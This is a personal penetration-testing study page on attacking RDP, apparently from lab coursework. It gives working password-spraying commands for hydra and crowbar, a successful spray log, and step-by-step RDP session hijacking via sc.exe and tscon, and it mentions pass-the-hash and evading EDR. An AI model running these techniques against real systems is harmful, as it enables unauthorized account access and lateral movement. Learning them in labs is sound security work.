Monty's Pentesting Notes | Obsidian

    RDP

    TCP/UPD port 3389

    Table of Contents

    Initiate an RDP session

    > sudo apt update && sudo apt install remmina remmina-plugin-rdp -y
    > remmina

    or xfreerdp

    xfreerdp /v:<target IP> /u:htb-student /p:HTB_@cademy_stdnt!

    Password Spraying Attack

    try too many passwords may cause account to get locked out -> instead, try multiple usernames against a single password. This is called Password Spraying

    cat usernames.txt 

root
test
user
guest
admin
administrator

    hydra:

    hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

    crowbar:

    crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

2022-04-07 15:35:50 START
2022-04-07 15:35:50 Crowbar v0.4.1
2022-04-07 15:35:50 Trying 192.168.220.142:3389
2022-04-07 15:35:52 RDP-SUCCESS : 192.168.220.142:3389 - administrator:password123
2022-04-07 15:35:52 STOP

    RDP Session Hijacking

    Context: we are logged in as juurena (UID = 2). We have admin privileges. We want to hijack Lewen (UID = 4)'s RDP session.

    if we want to impersonate a user without their password, we have to have SYSTEM privileges

    to elevate privielges from local admin to SYSTEM, we can use the Microsoft sc.exe library.

    C:\htb> query user

 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>juurena               rdp-tcp#13          1  Active          7  8/25/2021 1:23 AM
 lewen                 rdp-tcp#14          2  Active          *  8/25/2021 1:28 AM

C:\htb> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"

[SC] CreateService SUCCESS

    2 is Lewen's ID, and /dest: is set to our own SESSIONNAME
    the format is:

    tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

    Then run

    C:\htb> net start sessionhijack

    this should invoke a new terminal of user lewen. Start discovering lewen's privleges. maybe we'll get lucky, and the user is a member of the Help Desk group with admin rights to many hosts or even a Domain Admin.

    RDP Pass the Hash (PtH)

    there are applications and software that can only be accessed through the GUI. In this case, if we only have the NT hash (obtained through credential dumping like Attacking SAM, but can't crack it), we can use PtH technique to access RDP.

    see RDP (Linux) Section in PtH on how to successfully carry out this attack.

    Nmap NSE

    nmap nse -> nmap -sV -sC 10.129.201.248 -p3389 --script rdp*

    • we can use --packet-trace. We can see that the RDP cookies (mstshash=nmap) used by Nmap to interact with the RDP server can be identified by threat hunters and various security services such as Endpoint Detection and Response (EDR), and can lock us out as penetration testers on hardened networks
      nmap packet trace ->nmap -sV -sC 10.129.201.248 -p3389 --packet-trace --disable-arp-ping -n

    RDP-sec-check

    A Perl script named rdp-sec-check.pl can unauthentically identify the security settings of RDP servers based on handshakes

    to install:
    > sudo cpan
    > git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check
    > ./rdp-sec-check.pl 10.129.201.248

    RDP General Information

    For RDP session to be established, both the network firewall and the firewall on the server must allow connections from outside. If Network Address Translation (NAT) is used on the route between client and server, as is often the case with Internet connections, the remote computer needs the public IP address to reach the server. In addition, port forwarding must be set up on the NAT router in the direction of the server.

    RDP has handled Transport Layer Security (TLS/SSL) since Windows Vista, but many Windows systems still accept inadequate encryption via RDP Security.